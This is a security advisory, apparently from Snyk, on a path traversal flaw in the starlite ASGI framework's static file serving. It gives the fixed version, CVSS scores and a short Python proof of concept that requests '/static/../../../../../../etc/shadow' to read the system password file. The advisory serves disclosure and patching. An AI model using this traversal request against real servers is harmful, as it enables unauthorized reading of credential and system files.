Path Traversal Affecting starlite package, versions [1.37.0,1.51.16)


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.05% (17th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-PYTHON-STARLITE-6810221
  • published 7 May 2024
  • disclosed 6 May 2024
  • credit Brian Edgar Ré

How to fix?

Upgrade starlite to version 1.51.16 or higher.

Overview

starlite is a Light-weight and flexible ASGI API Framework

Affected versions of this package are vulnerable to Path Traversal through the static content serving function. An attacker can gain unauthorized access to sensitive files outside the designated directories by exploiting path traversal flaws in the file path handling mechanism.

Notes:

  1. From versions 0.X.X through 1.X.X, the package was released under the name "starlite."

  2. Starting with version 2.0.0 and for all subsequent versions, the package has been rebranded and released under the name "litestar."

PoC


import http.client

def send_request(host, port, path):
    connection = http.client.HTTPConnection(host, port)
    connection.request("GET", path)
    response = connection.getresponse()
    print(f"Status: {response.status}")
    print(f"Headers: {response.getheaders()}")
    data = response.read()
    print(f"Body: {data.decode('utf-8')}")
    connection.close()

send_request("localhost", 8000, "/static/../../../../../../etc/shadow")

CVSS Scores

version 3.1
Expand this section

Snyk

Recommended
8.2 high
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    Low
  • Availability (A)
    None